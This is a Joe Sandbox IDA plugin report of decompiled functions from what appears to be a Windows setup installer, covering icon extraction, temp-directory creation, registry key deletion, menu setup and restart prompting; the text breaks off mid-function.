Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 2256921126-2199428270
Opcode ID: 4a52b49269555dd24e66407e6512e7b8c4851ea3be2ab72a79cd741e1cb13119
Instruction ID: b6b9012cada698a387d74df3fd9597c4572ec37f04b771ac037875e1fbfc927b
Opcode Fuzzy Hash: 4a52b49269555dd24e66407e6512e7b8c4851ea3be2ab72a79cd741e1cb13119
Instruction Fuzzy Hash: 8251C931E001489BDB11EF61DC52ADEB7B9EF44345F6085BBF804A7282DB789F49CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00460D8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00460D8C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v348;
				int _v356;
				struct _SHFILEINFO _v360;
				int _t54;
				int _t65;
				void* _t68;
				void* _t69;
				void* _t76;
				void* _t77;
				intOrPtr _t92;
				intOrPtr _t93;
				void* _t104;
				void* _t105;
				intOrPtr _t106;

				_t102 = __esi;
				_t101 = __edi;
				_t104 = _t105;
				_t106 = _t105 + 0xfffffe9c;
				_push(__esi);
				_push(__edi);
				_v8 = 0;
				_push(_t104);
				_push(0x460f11);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				E00414834( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2dc)), 0x20);
				E00414854( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2dc)), 0x20);
				E00414834( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				E00414854( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				_push(_t104);
				_push(0x460ef1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				_t54 = SHGetFileInfo("c:\\directory", 0x10,  &_v360, 0x160, 0x1010); // executed
				if(_t54 != 0) {
					_t109 = _v348;
					if(_v348 != 0) {
						_t76 =  *0x48d014; // 0x400000
						_t77 = ExtractIconA(_t76,  &_v348, _v356); // executed
						E00460CCC(_t77,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2dc)), __edi);
					}
				}
				E00472518(0, 2, _t101, _t102, _t109,  &_v8); // executed
				if(_v8 == 0) {
					E00472518(1, 2, _t101, _t102, 0,  &_v8);
				}
				if(_v8 != 0) {
					_t65 = SHGetFileInfo(E00403880(_v8), 0,  &_v360, 0x160, 0x1000); // executed
					if(_t65 != 0 && _v348 != 0) {
						_t68 =  *0x48d014; // 0x400000
						_t69 = ExtractIconA(_t68,  &_v348, _v356); // executed
						E00460CCC(_t69,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), _t101);
					}
				}
				_pop(_t92);
				 *[fs:eax] = _t92;
				_pop(_t93);
				 *[fs:eax] = _t93;
				_push(E00460F18);
				return E00403548( &_v8);
			}

0x00460d8c
0x00460d8c
0x00460d8d
0x00460d8f
0x00460d96
0x00460d97
0x00460d9a
0x00460d9f
0x00460da0
0x00460da5
0x00460da8
0x00460dbc
0x00460dd2
0x00460de8
0x00460dfe
0x00460e05
0x00460e06
0x00460e0b
0x00460e0e
0x00460e29
0x00460e30
0x00460e32
0x00460e39
0x00460e49
0x00460e4f
0x00460e60
0x00460e60
0x00460e39
0x00460e6f
0x00460e78
0x00460e84
0x00460e84
0x00460e8d
0x00460eab
0x00460eb2
0x00460ecb
0x00460ed1
0x00460ee2
0x00460ee2
0x00460eb2
0x00460ee9
0x00460eec
0x00460efd
0x00460f00
0x00460f03
0x00460f10

APIs

SHGetFileInfo.SHELL32(onG,00000010,?,00000160,00001010), ref: 00460E29
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460E4F

Part of subcall function 00460CCC: DrawIconEx.USER32 ref: 00460D64
Part of subcall function 00460CCC: DestroyCursor.USER32(00000000), ref: 00460D7A

SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00460EAB
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460ED1

Strings

onG, xrefs: 00460D97, 00460E24

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Icon$ExtractFileInfo$CursorDestroyDraw
String ID: onG
API String ID: 2926980410-2936850197
Opcode ID: 08367b5098d52daf9bcfdf3e134ea9fccc895a34a18178e02685e265bdf1a550
Instruction ID: 118d6704fa3411ac146cb249a869623680478a0e83fade8adcb248fa0429d4b7
Opcode Fuzzy Hash: 08367b5098d52daf9bcfdf3e134ea9fccc895a34a18178e02685e265bdf1a550
Instruction Fuzzy Hash: 9C417E74600248AFDB20DB54CD89FDFBBE8EB48344F1045B6F8049B392D679AE81CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00471F5C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00471F5C(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _t43;
				int _t49;
				intOrPtr _t78;
				void* _t81;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t108;
				intOrPtr _t109;

				_t106 = __esi;
				_t105 = __edi;
				_t80 = __ebx;
				_t108 = _t109;
				_t81 = 5;
				do {
					_push(0);
					_push(0);
					_t81 = _t81 - 1;
				} while (_t81 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t108);
				_push(0x4720b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109;
				E00452118( &_v20, __ebx, __edx, __edi, __esi); // executed
				E00403598(0x4ae018, _t80, _v20, _t105, _t106);
				E004035DC( &_v20, "Created temporary directory: ");
				_t92 =  *0x4ae018; // 0x21fdbec
				E004036C4( &_v20, _t92);
				E00455814(_v20, _t80, _t105, _t106);
				if( *0x48deec != 0) {
					_t78 =  *0x4ae018; // 0x21fdbec
					E00455138(_t78);
				}
				_t43 =  *0x4ae018; // 0x21fdbec
				E0042C614(_t43,  &_v20);
				E00403708( &_v8, "_isetup", _v20);
				_t49 = CreateDirectoryA(E00403880(_v8), 0); // executed
				if(_t49 == 0) {
					_t80 = GetLastError();
					E00450C5C(0x2f,  &_v36, _v8);
					_v32 = _v36;
					E00406E04(_t63,  &_v40);
					_v28 = _v40;
					E0042E7A4(_t80,  &_v44);
					_v24 = _v44;
					E00450C2C(0x60, 2,  &_v32,  &_v20);
					E00408DF0(_v20, 1);
					E00403264();
				}
				E00455AAC( &_v12);
				_t113 = _v12;
				if(_v12 != 0) {
					E00403708( &_v16, "\\_setup64.tmp", _v8);
					E00471F04(_v12, _t80, _v16, _t105, _t106, _t113); // executed
					E00455B18(_v16);
				}
				_pop(_t95);
				 *[fs:eax] = _t95;
				_push(E004720B9);
				E00403568( &_v44, 3);
				return E00403568( &_v20, 4);
			}

0x00471f5c
0x00471f5c
0x00471f5c
0x00471f5d
0x00471f5f
0x00471f64
0x00471f64
0x00471f66
0x00471f68
0x00471f68
0x00471f6b
0x00471f6c
0x00471f6d
0x00471f70
0x00471f71
0x00471f76
0x00471f79
0x00471f7f
0x00471f8c
0x00471f99
0x00471fa1
0x00471fa7
0x00471faf
0x00471fbb
0x00471fbd
0x00471fc2
0x00471fc2
0x00471fca
0x00471fcf
0x00471fdf
0x00471fef
0x00471ff6
0x00471ffd
0x0047200b
0x00472013
0x0047201b
0x00472023
0x0047202b
0x00472033
0x00472040
0x0047204f
0x00472054
0x00472054
0x0047205c
0x00472061
0x00472065
0x00472072
0x0047207d
0x00472085
0x00472085
0x0047208c
0x0047208f
0x00472092
0x0047209f
0x004720b1

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004720B2,?,?,?,?,00000000,00000000,?,00489B07,00000005,?,00000000,00489A2C), ref: 00471FEF
GetLastError.KERNEL32(00000000,00000000,00000000,004720B2,?,?,?,?,00000000,00000000,?,00489B07,00000005,?,00000000,00489A2C), ref: 00471FF8

Strings

\_setup64.tmp, xrefs: 0047206A
_isetup, xrefs: 00471FDA
Created temporary directory: , xrefs: 00471F91

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup
API String ID: 1375471231-2952887711
Opcode ID: b2cc08cddc1080a237eda141dba4d5db7b291d9ad200111262bd14dd5cfff34c
Instruction ID: 1d498d71d49390669bcb8363c298d557dbb2d3ed68d0052a49d8ac0daae2ead7
Opcode Fuzzy Hash: b2cc08cddc1080a237eda141dba4d5db7b291d9ad200111262bd14dd5cfff34c
Instruction Fuzzy Hash: 61415374A002199BDB10FFA5C881ADEB7B5EF44305F50853BE91077392DB78AE05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042DDB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
registryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042DDB0(void* __eax, char* __ecx, void* __edx) {
				struct HINSTANCE__* _t4;
				long _t5;

				_t9 = __ecx;
				_t6 = __edx;
				if(__eax == 2) {
					if( *0x48d65c == 0) {
						_push("RegDeleteKeyExA");
						_t4 = GetModuleHandleA("advapi32.dll");
						_push(_t4);
						L00405AA4();
						 *0x48d65c = _t4;
					}
					if( *0x48d65c == 0) {
						return 0x7f;
					} else {
						return  *0x48d65c(_t6, _t9, 0x100, 0);
					}
				}
				_t5 = RegDeleteKeyA(__edx, __ecx); // executed
				return _t5;
			}

0x0042ddb2
0x0042ddb4
0x0042ddb8
0x0042ddcb
0x0042ddcd
0x0042ddd7
0x0042dddc
0x0042dddd
0x0042dde2
0x0042dde2
0x0042ddee
0x00000000
0x0042ddf0
0x00000000
0x0042ddf9
0x0042ddee
0x0042ddbc
0x0042ddc3

APIs

RegDeleteKeyA.ADVAPI32(?,?), ref: 0042DDBC
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF3F,00000000,0042DF57,?,?,?,?), ref: 0042DDD7
6D2B5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF3F,00000000,0042DF57,?,?,?,?), ref: 0042DDDD

Strings

advapi32.dll, xrefs: 0042DDD2
RegDeleteKeyExA, xrefs: 0042DDCD

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550DeleteHandleModule
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 4057711527-1846899949
Opcode ID: 288ca87a7c51869f6ade81fd504270e4d940822648a9e56890414050d9e692d3
Instruction ID: c19cd24ebecbd8f981b26dd809c266447ed7ef14191792cf4e418f79b35b6877
Opcode Fuzzy Hash: 288ca87a7c51869f6ade81fd504270e4d940822648a9e56890414050d9e692d3
Instruction Fuzzy Hash: D6E065B1F1163466DA1072657C49B9717289B28316F51453BF109BD1D1D6BC4880DF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00476554 Relevance: 7.6, APIs: 5, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00476554(void* __ebx, void* __ecx, char __edx, void* __edi, intOrPtr __esi) {
				char _v5;
				char _v12;
				intOrPtr* _t17;
				intOrPtr _t23;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t57;
				void* _t58;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				struct HMENU__* _t75;
				void* _t77;
				void* _t78;
				intOrPtr _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t58 = __ecx;
				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_t80 = __edx;
				if(__edx != 0) {
					_t79 = _t79 + 0xfffffff0;
					_t17 = E00402E78(_t17, _t77);
				}
				_v5 = _t63;
				_t57 = _t17;
				_push(_t77);
				_push(0x47668b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				E004203C4(_t58, 0); // executed
				E0048811C(_t57, _t80);
				if(( *0x4ae17d & 0x00000001) == 0) {
					_t23 =  *0x48d628; // 0x21d2410
					 *((char*)(_t23 + 0x3a)) = 0;
				} else {
					if(( *0x4ae17d & 0x00000002) != 0) {
						__eflags =  *0x4ae17d & 0x00000004;
						if(( *0x4ae17d & 0x00000004) == 0) {
							E004211DC(_t57, 1);
						}
					} else {
						E004211DC(_t57, 0);
					}
					_t74 =  *_t57;
					 *((intOrPtr*)( *_t57 + 0x4c))(GetSystemMetrics(1), GetSystemMetrics(0));
					E004183D4(_t57);
					if(( *0x4ae17d & 0x00000008) != 0) {
						E0042176C(_t57, 2);
					}
				}
				_t65 =  *0x4ae278; // 0x21e49dc
				E00450C5C(0x99,  &_v12, _t65);
				E00414D30(_t57, _t57, _v12, _t73, _t74);
				_t75 = GetSystemMenu(E004183F8(_t57), 0);
				AppendMenuA(_t75, 0x800, 0, 0);
				_t32 =  *0x48db70; // 0x21e8eb4
				AppendMenuA(_t75, 0, 0x270f, E00403880(_t32));
				_t35 =  *0x48d628; // 0x21d2410
				E004246EC(_t35, _t73, _t75, 0x477dc8, _t57);
				_t37 =  *0x48d628; // 0x21d2410
				if( *((char*)(_t37 + 0x3a)) != 0) {
					E00420DD8(_t57, 1);
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x476692);
				return E00403548( &_v12);
			}

0x00476554
0x00476554
0x00476554
0x00476554
0x00476555
0x00476557
0x0047655b
0x0047655c
0x0047655f
0x00476562
0x00476564
0x00476566
0x00476569
0x00476569
0x0047656e
0x00476571
0x00476575
0x00476576
0x0047657b
0x0047657e
0x00476585
0x0047658c
0x00476598
0x004765f6
0x004765fb
0x0047659a
0x004765a1
0x004765ae
0x004765b5
0x004765bb
0x004765bb
0x004765a3
0x004765a7
0x004765a7
0x004765d6
0x004765d8
0x004765dd
0x004765e9
0x004765ef
0x004765ef
0x004765e9
0x00476602
0x0047660a
0x00476614
0x00476628
0x00476634
0x00476639
0x0047664c
0x00476657
0x0047665c
0x00476661
0x0047666a
0x00476670
0x00476670
0x00476677
0x0047667a
0x0047667d
0x0047668a

APIs

GetSystemMetrics.USER32 ref: 004765C2
GetSystemMetrics.USER32 ref: 004765CA
GetSystemMenu.USER32(00000000,00000000,00000000,0047668B), ref: 00476623
AppendMenuA.USER32 ref: 00476634
AppendMenuA.USER32 ref: 0047664C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MenuSystem$AppendMetrics
String ID:
API String ID: 4092608398-0
Opcode ID: e43ecf7685c102d530d18a92146b1499113c13fe4420706c56d4e9a9ae10726d
Instruction ID: 96842d1d0265868ad5032109c8ca27fb30cd5cc7f00f74ecd897c9a05342b594
Opcode Fuzzy Hash: e43ecf7685c102d530d18a92146b1499113c13fe4420706c56d4e9a9ae10726d
Instruction Fuzzy Hash: 1431D4703047546BD310FB369C82B9A3B9A9B06718F55887EB804A72E3CA7D9C08875C

Uniqueness

Uniqueness Score: -1.00%

Function 00453637 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00453637() {
				intOrPtr _t36;
				void* _t38;

				CloseHandle( *(_t38 - 0x60));
				if( *((char*)(_t38 + 0x14)) != 0) {
					WaitForInputIdle( *(_t38 - 0x64), 0xffffffff);
				}
				if( *((char*)(_t38 + 0x18)) != 0) {
					do {
						if( *((intOrPtr*)(_t38 + 0xc)) != 0) {
							 *((intOrPtr*)(_t38 + 0xc))();
						}
					} while (MsgWaitForMultipleObjects(1, _t38 - 0x64, 0, 0xffffffff, 0xff) == 1);
				}
				GetExitCodeProcess( *(_t38 - 0x64),  *(_t38 + 8)); // executed
				CloseHandle( *(_t38 - 0x64));
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E004536BF);
				E00403568(_t38 - 0x6c, 2);
				E00403548(_t38 - 8);
				return E00403548(_t38 + 0x1c);
			}

0x0045363b
0x00453644
0x0045364c
0x0045364c
0x00453655
0x00453657
0x0045365b
0x0045365d
0x0045365d
0x00453674
0x00453657
0x0045367f
0x00453688
0x0045368f
0x00453692
0x00453695
0x004536a2
0x004536aa
0x004536b7

APIs

CloseHandle.KERNEL32(?), ref: 0045363B
WaitForInputIdle.USER32 ref: 0045364C
MsgWaitForMultipleObjects.USER32 ref: 0045366F
GetExitCodeProcess.KERNEL32 ref: 0045367F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00453688

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseHandleWait$CodeExitIdleInputMultipleObjectsProcess
String ID:
API String ID: 2750287839-0
Opcode ID: 7c182a02d3b1a07d3612e1367028a1ff14e218a41bee7e5c62843503e6af4cbd
Instruction ID: 50b9121f7bf57fafa210125d37be638fc96df00772b7c6e82edbd2a74dd08561
Opcode Fuzzy Hash: 7c182a02d3b1a07d3612e1367028a1ff14e218a41bee7e5c62843503e6af4cbd
Instruction Fuzzy Hash: 15011E71504309BADF20EFE9CC45B9E77A89F04365F50413BB914EB2D2CA3C9A44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00477688 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00477688(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _v8;
				char _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t56;
				void* _t63;
				intOrPtr _t78;
				signed int _t110;
				intOrPtr _t121;
				intOrPtr _t142;
				intOrPtr _t158;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t180;
				intOrPtr _t182;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t193;
				void* _t198;
				void* _t199;
				intOrPtr _t200;
				void* _t208;

				_t208 = __fp0;
				_t195 = __esi;
				_t194 = __edi;
				_t151 = __ecx;
				_t198 = _t199;
				_t200 = _t199 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v32 = 0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __eax;
				_push(_t198);
				_push(0x477987);
				_push( *[fs:eax]);
				 *[fs:eax] = _t200;
				_v9 = 0;
				_push(_t198);
				_push(0x47793b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t200;
				_t56 = E004651F0( *0x4adf64, __ecx, 0);
				_t202 = _t56;
				if(_t56 == 0) {
					E00408DC4();
				}
				E00414D00( *((intOrPtr*)( *0x4adf64 + 0x208)),  &_v20, _t202);
				E00403598(0x4ae22c, 0x4adf64, _v20, _t194, _t195);
				_t63 = E00465458( *0x4adf64, 0x4adf64, _t151, _t194, _t195, _t202);
				_t203 = _t63;
				if(_t63 == 0) {
					E00408DC4();
				}
				E00414D00( *((intOrPtr*)( *0x4adf64 + 0x20c)),  &_v20, _t203);
				E00403598(0x4ae230, 0x4adf64, _v20, _t194, _t195);
				 *0x4ae234 = E0042B2DC( *((intOrPtr*)( *0x4adf64 + 0x210)));
				 *0x4ae238 = E00463118( *0x4adf64);
				_push(0);
				_t170 =  *0x4ae23c; // 0x21d29f4
				E00463364( *0x4adf64, 0x4adf64, 0, _t170, _t194, _t195);
				_t171 =  *0x4ae240; // 0x21d2a20
				E004634D4( *0x4adf64, 0x4adf64, 0, _t171, _t194, _t195, 0, 0);
				_t204 =  *0x4adfb8;
				if( *0x4adfb8 != 0) {
					E0046F754( *0x4adfb8, 0x4adf64, _t194, _t195, _t204);
				}
				_t78 =  *0x48d628; // 0x21d2410
				E004243F4(_t78);
				 *((intOrPtr*)( *_v8 + 0x50))();
				_t205 =  *0x4ae24d - 1;
				if( *0x4ae24d == 1) {
					_t142 =  *0x48d628; // 0x21d2410
					SetActiveWindow( *(_t142 + 0x20));
					E0042301C( *0x4adf64);
				}
				 *((intOrPtr*)( *((intOrPtr*)( *0x4adf64)) + 0x50))();
				E00476D40(_v8, 0, 1);
				E0046D0B4( &_v10, 0x4adf64, 0, _t194, _t195, _t205, _t208); // executed
				if(_v10 != 0) {
					E004773BC(0x4adf64, 1, _t194, _t195, _t198); // executed
					E00476D40(_v8, 1, 2);
					__eflags =  *0x4ae17e & 0x00000001;
					if(( *0x4ae17e & 0x00000001) != 0) {
						SHChangeNotify(0x8000000, 0, 0, 0);
					}
					__eflags =  *0x4ae181 & 0x00000004;
					if(( *0x4ae181 & 0x00000004) != 0) {
						E004545BC(1);
					}
					__eflags =  *0x4ae24d;
					if( *0x4ae24d != 0) {
						E00423014();
					}
					_v28 =  *0x0048CA40;
					_v24 = 0xb;
					E00455A04("Need to restart Windows? %s", 0x4adf64, 0,  &_v28, _t194, _t195);
					__eflags =  *0x4ae256;
					if( *0x4ae256 == 0) {
						__eflags =  *0x4ae294;
						if( *0x4ae294 == 0) {
							E004603D4(0x50,  &_v16);
						} else {
							E004603D4(0x4f,  &_v16);
						}
						E004035DC( &_v32, _v16);
						E004036C4( &_v32, 0x4779c4);
						_t180 =  *0x48dbd4; // 0x21e91f8
						E004036C4( &_v32, _t180);
						E00462CBC( *0x4adf64, 0x4adf64, 0, _v32, _t194, _t195, __eflags);
						_t158 =  *0x4ae240; // 0x21d2a20
						_t182 =  *0x4ae23c; // 0x21d29f4
						E00462D84( *0x4adf64, 0x4adf64, _t158, _t182, _t194, _t195);
						_t110 =  *((intOrPtr*)( *( *( *((intOrPtr*)( *0x4adf64 + 0x2d0)) + 0xfc)) + 0x10))();
						_t110 = _t110 > 0;
						E00414C5C( *((intOrPtr*)( *0x4adf64 + 0x2d0)), _t158,  *( *( *((intOrPtr*)( *0x4adf64 + 0x2d0)) + 0xfc)) & 0xffffff00 | _t110 > 0x00000000, _t194);
					} else {
						__eflags =  *0x4adfbf;
						if(__eflags == 0) {
							E004603D4(0x51,  &_v32);
							E00462CBC( *0x4adf64, 0x4adf64, 0, _v32, _t194, _t195, __eflags);
							E00414C5C( *((intOrPtr*)( *0x4adf64 + 0x258)), 0, 1, _t194);
							E00414C5C( *((intOrPtr*)( *0x4adf64 + 0x25c)), 0, 1, _t194);
						}
					}
					__eflags =  *0x4ae24d;
					if( *0x4ae24d == 0) {
						_t121 =  *0x48d628; // 0x21d2410
						E004243F4(_t121);
						 *((intOrPtr*)( *_v8 + 0x50))();
					}
					_v9 = 1;
					_pop(_t185);
					 *[fs:eax] = _t185;
				} else {
					E00476544();
					_pop(_t193);
					 *[fs:eax] = _t193;
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(0x47798e);
				E00403548( &_v32);
				E00403548( &_v20);
				return E00403548( &_v16);
			}

0x00477688
0x00477688
0x00477688
0x00477688
0x00477689
0x0047768b
0x0047768e
0x0047768f
0x00477690
0x00477693
0x00477696
0x00477699
0x0047769c
0x004776a6
0x004776a7
0x004776ac
0x004776af
0x004776b2
0x004776b8
0x004776b9
0x004776be
0x004776c1
0x004776c6
0x004776cb
0x004776cd
0x004776cf
0x004776cf
0x004776df
0x004776ec
0x004776f3
0x004776f8
0x004776fa
0x004776fc
0x004776fc
0x0047770c
0x00477719
0x0047772b
0x00477737
0x0047773c
0x00477740
0x00477748
0x00477753
0x0047775b
0x00477760
0x00477767
0x0047776e
0x0047776e
0x00477773
0x00477778
0x00477782
0x00477785
0x0047778c
0x0047778e
0x00477797
0x0047779e
0x0047779e
0x004777a7
0x004777b1
0x004777b9
0x004777c2
0x004777d7
0x004777e4
0x004777e9
0x004777f0
0x004777fd
0x004777fd
0x00477802
0x00477809
0x0047780b
0x0047780b
0x00477810
0x00477817
0x0047781b
0x0047781b
0x0047782e
0x00477831
0x0047783f
0x00477844
0x0047784b
0x00477891
0x00477898
0x004778ab
0x0047789a
0x0047789f
0x0047789f
0x004778b6
0x004778c3
0x004778cb
0x004778d1
0x004778db
0x004778e0
0x004778e6
0x004778ee
0x00477903
0x00477908
0x0047790d
0x0047784d
0x0047784d
0x00477854
0x0047785f
0x00477869
0x00477878
0x00477887
0x00477887
0x00477854
0x00477912
0x00477919
0x0047791b
0x00477920
0x0047792a
0x0047792a
0x0047792d
0x00477933
0x00477936
0x004777c4
0x004777c4
0x004777cb
0x004777ce
0x004777ce
0x00477963
0x00477966
0x00477969
0x00477971
0x00477979
0x00477986

APIs

SetActiveWindow.USER32(?,?,00000000,00477987,?,?,00000001,?), ref: 00477797
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004777FD

Strings

Need to restart Windows? %s, xrefs: 0047783A
, xrefs: 004778BE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: d01ab587a75c5507bdcc41127d8adbccf63bb8e795f2f117ca59e628db7cccff
Instruction ID: 83278825b1ded4e178978ad3f2fdb75ea9d9387787a6f4e2c5a5753d90fbcd93
Opcode Fuzzy Hash: d01ab587a75c5507bdcc41127d8adbccf63bb8e795f2f117ca59e628db7cccff
Instruction Fuzzy Hash: AE81A570A041449FDB00EF69D885BDE7BE4EF45304F5084BBE8149B3A2DB78AD05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00467F84 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00467F84(signed int __eax, void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _t92;
				signed int _t103;
				intOrPtr* _t108;
				signed int _t133;
				signed int _t138;
				intOrPtr _t153;
				void* _t158;
				void* _t174;
				void* _t176;

				_t176 = __eflags;
				_t169 = __edi;
				_t135 = __ecx;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v44 = 0;
				_v48 = 0;
